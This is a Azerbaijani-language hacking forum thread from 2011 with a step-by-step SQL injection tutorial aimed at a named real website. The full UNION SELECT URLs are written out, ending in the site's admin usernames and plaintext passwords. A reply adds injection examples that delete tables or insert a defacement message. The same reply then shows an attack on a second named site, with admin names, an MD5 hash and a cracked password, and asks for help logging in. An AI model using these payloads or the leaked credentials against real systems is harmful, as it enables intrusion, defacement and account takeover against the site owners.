Istifadəçi |
2011-12-01 18:59 GMT |
|
|
|
VIP |
|
Mesaj Sayı : 128 |
Mövzu Sayı : |
Rep Ver : |
Rep Sayı : 2 |
Indi Saytda : |
Cinsiyyət : Oğlan |
|
Şəhər : |
Ölkə : |
Məslək : |
Yaş : 46 |
Mesaj : |
|
Sitat Movzu PC-de shexsi arxivimden goturulub,muellif deqiq yadimda deyil.antivirus ve yaxudda Bot_25-e mexsus olmalidir.
Qiymetli derslik oldugu uchun,istedim yeni bashlayanlarla paylashim.Derslik uchun Muellife teshekkur.
Dedim qoy bu defe yazim sql injection haqqinda..Gorurem foruma qoyanda ele bilirler goyden dusme hardansa goturub qoyuruq//
Saytimiz: http://accuposturesystems.com/
Sql inj axtaririq ve inj olan linkimiz: http://accuposturesystems.com/subaccessories1.php?query=1&main_category_id=-1'a
Burda 1-in qarsisina - isaresi qoyuruq ki bezen olmadiqda sehv cixir..
Sirani tapaq.. ve bele cixdi linkimiz: http://accuposturesystems.com/subaccessories1.php?query=1&main_category_id=-1+union+select+1,2,3,4,5,6,7,8,9
2 3 cixdi siralar..versiyasina baxaq..
5.0.81-community-log cixdi..yaxsi demeli schema kececey//
table-lara baxaq..linkimiz: [url]http://accuposturesystems.com/subaccessories1.php?query=1&main_category_id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables[/url]
table-larimiz: CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,
SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,main_category,sub_category,sub_sub_category,
tblaccess_detail,tblaccessoriz,tbladmin,tblcontent,tblimage
bize lazim admin table : tbladmin
indi de tbladmin-deki column-lara baxaq..linkimiz: [url]http://accuposturesystems.com/subaccessories1.php?query=1&main_category_id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_name=tbladmin[/url]
doList ErrorUnknown column 'tbladmin' in 'where clause' sehv cixdi..demeli admin table-i hexlemeliyik..
men bu saytda hexliyecem..text-e yazib asagida Pure Bytes ("A934") formati secib encode edirik ve hexlenmis hal 74626C61646D696E00 kimi aliriq..burda axirdaki 2 dene sifiri (hemise istenilen table hexledikde axirda 2 dene sifir olur ve hemise de linke qoyduqda silmeliyik) silirik ve qarsisina 0x yazib linke qoyuruq ve linkimiz:
[url]http://accuposturesystems.com/subaccessories1.php?query=1&main_category_id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x74626C61646D696E[/url]
ve tbladmin table-indaki columnlar cixir..columnlar: rkey,name,username,password,lastlogin
lazim olanlar: username password
axira +from+tbladmin columnlari ise group_concat(username,0x3a,password) edib linkde yaziriq// linkimiz:
[url]http://accuposturesystems.com/subaccessories1.php?query=1&main_category_id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+tbladmin[/url]
burda linkde yazdigim 0x3a 2 noqte) isaresi demekdi bunu yazdim ki login ve pass secmey olsun biri-birine qarismasin..tekce 0x3a yox 0x0b 0z2d ve s. bele isareler var ki her biri bildiyimiz bir isaredi..Burdan baxa bilersiniz..
bu da adminlerin login ve pass-lari..
stephen:mand01,ashton:createone,Paolo:isthebest
istesek char() funksiyasi ile alt-alta da duze bilerik..
neyse..hazirdi admin panel tapan vurar indexin vurar..
indi ise bezi meqamlari deyim..yuxarida versiyaya baxdiq bundan elave server melumatlarina baxa bilerik..
version() - versiyaya baxmaq
user() system_user() session_user() - user adina baxmaq ucundur her ucu..
database() - baza adina baxmaq ucun
@@version_compile_os - serverdeki OS-un adina ve versiyasina baxmaq ucun
now() curdate() - her ikisi servedeki vaxti ve tarixi gosterir
linkde yazdigim group_concat() -in yerine concat() concat_ws() de yaza bilerdim..ama group_concat() yazdim ki axtardgimizin hamisi cixsin sehifeye..
serverdeki bezi direktoriyalara da baxmaq olar..mes, men istifade etdiklerim..
@@basedir
@@datadir
@@tmpdir
Neyse bu qeder kim ne basa dusmese sorusa biler//
|
Anti-armenia.ORG |
|
Istifadəçi |
2011-12-01 19:38 GMT |
|
|
|
İstifadəçi |
|
Mesaj Sayı : 3 |
Mövzu Sayı : |
Rep Ver : |
Rep Sayı : 0 |
Indi Saytda : |
Cinsiyyət : Oğlan |
|
Şəhər : |
Ölkə : |
Məslək : |
Yaş : |
Mesaj : |
|
tewekkurler...senin movzuna elave olaraq men de bunlar paylawmaq istedim.
SQL injection belkede yegane usuldu sayti hacklamaq ucun..yeni bu ne demekdir? Ramsessin gosterdiyi emeliyyatla saytin sql aciqindan saytin bazasina daxil olub,(html kod daxil etmekle) bazani deyiwe biler,ve bir sozle istediyinizi ede bilersiniz.Indi men size awaqida 2 primer gosterecem.SQL-le butun bazani deyiwib oz bazanizi nece qoya blersiniz.
1.SqlCommand command = new SqlCommand("DELETE from [Table] where id = "
2.+ Request.QueryString["id"], conn);
3. conn.Open();
4. command.ExecuteNonQuery();
5. conn.Close();
mesel1
35" target="_blank" onclick="if(confirm('Linkə keçid edək?')){return true;} else {return false;}">http://localhost:1475/injections/Default.aspx?id=>35 qoyursunuz(id-i tapdiqdan sonra)
id" target="_blank" onclick="if(confirm('Linkə keçid edək?')){return true;} else {return false;}">http://localhost:1475/injections/Default.aspx?id=>id yuxaridaki 35-in yerine id qoyursunuz,,bu veziyyetde her weyi silmiw olursunuz
mesel2
[url]http://localhost:1475/injections/Default.aspx?id=35;+INSERT+INTO+[Table]+([title],+[body])+VALUES+(bu[/url] sayt hack edildi BY_RAMSESS)
Ramsess bir cetinliyim var ...komek elesen de saqol elemesende
http://www.emultrix.com/modules.php?name=Mediacatalog&pa=Newsreliz&catnewid=3+union+select+1,2,admins_login,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47,48,49+from+spnuke_admins/
bura kimi geldim bele sonuc aldim
# Admin
# Ferz
# ewgenij
# pitbul
# Duschmann
# Sako
# stasm
# roman
# ekctpa
# stinker
# -=TaNaToS=-
# avanes
ve bele md5 cavab Sako 91a7e942c18741ebb9458243a7bd028b
cevirib bu cavabi aldim Sako - 2099141
http://www.emultrix.com/admin.php
login - sako
password - 2099141 bu cur girirem eror verir neyi sehv etmiwem....?
|
Anti-armenia.ORG |
|
|
|